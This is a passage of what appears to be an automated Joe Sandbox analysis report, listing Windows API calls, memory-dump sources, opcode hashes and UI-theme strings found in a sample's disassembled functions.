                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                                                                      • Opcode ID: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
                                                                                                                                                                                                                      • Instruction ID: eea3f1f600f57e6be839ff3324e32955c5b0d44ddec7c8ef99e88bc83afa443c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC0013A018200FFCA024B80CD04D0ABFB2BBA8325B10C858B2A848031C733C032EB02
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB3EF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                                                                      • Opcode ID: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
                                                                                                                                                                                                                      • Instruction ID: eea3f1f600f57e6be839ff3324e32955c5b0d44ddec7c8ef99e88bc83afa443c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC0013A018200FFCA024B80CD04D0ABFB2BBA8325B10C858B2A848031C733C032EB02
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PostMessageW.USER32(?,000007E9,?,?), ref: 00AA67E0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                      • Opcode ID: 8286cb0242e06ba95fd0c99ba71b59cb5e11d2971fd54dd3543fdad69bef432f
                                                                                                                                                                                                                      • Instruction ID: 2c1fe107717f23eac930d37e5296c92466be098fea7f4d3e5642554883f93220
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8286cb0242e06ba95fd0c99ba71b59cb5e11d2971fd54dd3543fdad69bef432f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82B0923A909241BFCA029B61CD09C8EBE72BBA8384F008449B28815070C63680B0EF02
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __locking
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 793501599-0
                                                                                                                                                                                                                      • Opcode ID: 8de71eea63014ef0e9bc0fb451592f828a1a23cc2667e30a76acf752c6adc1a6
                                                                                                                                                                                                                      • Instruction ID: d65e012af5ca2ca3bbedecc8d6cf662ed95d0be241ec5cabcad1694ff6851feb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8de71eea63014ef0e9bc0fb451592f828a1a23cc2667e30a76acf752c6adc1a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33B0027A408204BECA425B90AD55E1FBBA2ABA4724F54C959B6A840121E7329538EB53
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00A94C69
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                      • Opcode ID: e73fa7806717225303468aae1462d9059a1e62d7741d3dd49537ba76e48363a1
                                                                                                                                                                                                                      • Instruction ID: b77282282d2acb690a6282ab26666df87a0c0ba2fc35aa3a3a793c9769d000b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e73fa7806717225303468aae1462d9059a1e62d7741d3dd49537ba76e48363a1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BD0C934305201AFEE0157709D44A6977E2AB88331FA08A18B561D21E0CB34C8019611
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00A929E6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                      • Opcode ID: ef28ecde92202e432fe9f04b435436a8e57667f7bd5811b038a217f2c1be745b
                                                                                                                                                                                                                      • Instruction ID: bffac1052950b9db60791f9db00c7a0265e56d7b1d8a295ea1f021ef7183f874
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef28ecde92202e432fe9f04b435436a8e57667f7bd5811b038a217f2c1be745b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8D0C935608200BFDF215BB09D0592A7BE7EB88331FA08A18F676C20A0CB35CC10AB12
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00AB69EF,00AB68D3,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00AB74F6,?,&pid=), ref: 00AB696A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                      • Opcode ID: 7d0c9a7ed208897bb5dd22c736bdb750e9669f48a8b275050b6bdabc8955a862
                                                                                                                                                                                                                      • Instruction ID: 6d5c1f0783868506917a63d44fd864ff25347fb2afe33536d7f8ab336adab30e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d0c9a7ed208897bb5dd22c736bdb750e9669f48a8b275050b6bdabc8955a862
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1D09E724107118BD7308F25E54879276F8AB04B36F244A5DA4B687591C774D9458A54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00A93D42
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                      • Opcode ID: f2f82acfb01983a96a62f0dd86840fd4fcbdc92c54b0a7ba127a439084fecfbe
                                                                                                                                                                                                                      • Instruction ID: fa1188e834e453ebc782a1d2a5bb25394c248005815b3cef120239baedb0e611
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2f82acfb01983a96a62f0dd86840fd4fcbdc92c54b0a7ba127a439084fecfbe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DED0C936308200BFCF515BB49D1892A7BF2EB84371B508E18F575C60E0CB39CD10AB12
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00A93DB5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                      • Opcode ID: 1497f2c710b871f635ddff89f9131fe779f3c5ad135b94add4a65deeb5e27e23
                                                                                                                                                                                                                      • Instruction ID: 6cc6bea635c87f15d707b541f2bb99cc775ad852ba17d3f03f0bc8900ae6aa30
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1497f2c710b871f635ddff89f9131fe779f3c5ad135b94add4a65deeb5e27e23
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51D01235304201BFDF015770DD1496E7AF2EB44371B500E58F5A1C21F0CB35CC45A611
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharNext$H_prolog3__fprintf_l_vswprintf_s_wcslenlstrlen
                                                                                                                                                                                                                      • String ID: %*.*f
                                                                                                                                                                                                                      • API String ID: 2955926446-4192566172
                                                                                                                                                                                                                      • Opcode ID: fe39b04d4b0d29d1ebb4dd601cd19659bdd2cffb4389032ba6bfec05f5e0ef00
                                                                                                                                                                                                                      • Instruction ID: 154647ed79104b9c8b8642ba15b49b1e64f5408e886193a5b456ad29cea3d777
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe39b04d4b0d29d1ebb4dd601cd19659bdd2cffb4389032ba6bfec05f5e0ef00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7C1C0B990131B8BDF10DFADCC846AFB2B0EF05319F524659D460E6A80D774A981C77E
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6C62ECD0
                                                                                                                                                                                                                      • StringFromGUID2.OLE32(6C6BD1C4,?,00000104), ref: 6C62ECEC
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6C62ED3F
                                                                                                                                                                                                                      • StringFromGUID2.OLE32(6C6BD014,?,00000104,?,6C6C7AEC), ref: 6C62ED58
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FromString_memset
                                                                                                                                                                                                                      • String ID: category$icon$iid$image$line_height$opacity$rich_list$theme
                                                                                                                                                                                                                      • API String ID: 4039750888-1465912547
                                                                                                                                                                                                                      • Opcode ID: 0db0c3f1715086fad8bccbfc5fadeba662ba3962fc13afdd20f7c63ccf4a56cf
                                                                                                                                                                                                                      • Instruction ID: 566f908726ada0f737577174a698db44c2e1f9f877c455b7d9ae43864ba401be
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0db0c3f1715086fad8bccbfc5fadeba662ba3962fc13afdd20f7c63ccf4a56cf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72B16571A10208BBCB09EFA9DC91DEE7BB9EF95358F100119F405A7750DB346909CBAE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C616C6B
                                                                                                                                                                                                                        • Part of subcall function 6C5DC2CF: lstrlenW.KERNEL32(00000010,THEME.UI,?,00000000,6C5F0BA5,?,00000008,6C5FDEF0,?,00000010,?), ref: 6C5DC2F9
                                                                                                                                                                                                                        • Part of subcall function 6C65A9FC: __EH_prolog3.LIBCMT ref: 6C65AA03
                                                                                                                                                                                                                        • Part of subcall function 6C65A916: __EH_prolog3.LIBCMT ref: 6C65A91D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$lstrlen
                                                                                                                                                                                                                      • String ID: %d,%d,%d,%d$0,0,0,0$0x%x$anchor$bound$control_style$margin$shortcut$style$tab_id$tip
                                                                                                                                                                                                                      • API String ID: 1485999228-2291584412
                                                                                                                                                                                                                      • Opcode ID: 5487e59d579a20ab8490d75546d12333ca4a9a440a320018d2649d550e8224bc
                                                                                                                                                                                                                      • Instruction ID: ed4c2345df526c186bec593ac15a5164edea8c0097c6b49060f5f5043aa2c62d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5487e59d579a20ab8490d75546d12333ca4a9a440a320018d2649d550e8224bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8916EB1914349FBCF05ABE9CD41AEEBFB9AB99214F11444CF045B3741CB356A048BAA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C668C7C
                                                                                                                                                                                                                        • Part of subcall function 6C65A00F: __EH_prolog3_catch.LIBCMT ref: 6C65A016
                                                                                                                                                                                                                        • Part of subcall function 6C6599EF: __EH_prolog3.LIBCMT ref: 6C6599F6
                                                                                                                                                                                                                        • Part of subcall function 6C5DC2CF: lstrlenW.KERNEL32(00000010,THEME.UI,?,00000000,6C5F0BA5,?,00000008,6C5FDEF0,?,00000010,?), ref: 6C5DC2F9
                                                                                                                                                                                                                        • Part of subcall function 6C667EFC: __EH_prolog3.LIBCMT ref: 6C667F03
                                                                                                                                                                                                                        • Part of subcall function 6C6598E1: __EH_prolog3.LIBCMT ref: 6C6598E8
                                                                                                                                                                                                                        • Part of subcall function 6C5D894F: InterlockedDecrement.KERNEL32(-000000F4), ref: 6C5D8963
                                                                                                                                                                                                                        • Part of subcall function 6C668612: __EH_prolog3_GS.LIBCMT ref: 6C668619
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$DecrementH_prolog3_H_prolog3_catchInterlockedlstrlen
                                                                                                                                                                                                                      • String ID: border$canvas$font$fonts/$normal$ref$width
                                                                                                                                                                                                                      • API String ID: 479624069-4029285125
                                                                                                                                                                                                                      • Opcode ID: 1451eff23fdba4102500645468bb59fc07dd0916c5351210e6ccc6324751cd88
                                                                                                                                                                                                                      • Instruction ID: f54785367da91ff628ac45632fe8231bc39d689ffb71ba200e4e7c404d464aea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1451eff23fdba4102500645468bb59fc07dd0916c5351210e6ccc6324751cd88
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFC19470901249EFDF04DBE8C950AEEBBB5AF5A308F604049E415A7B91DB346F09C76A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(6C5E3FDF,6C702818,6C702408), ref: 6C638C97
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 6C638CAA
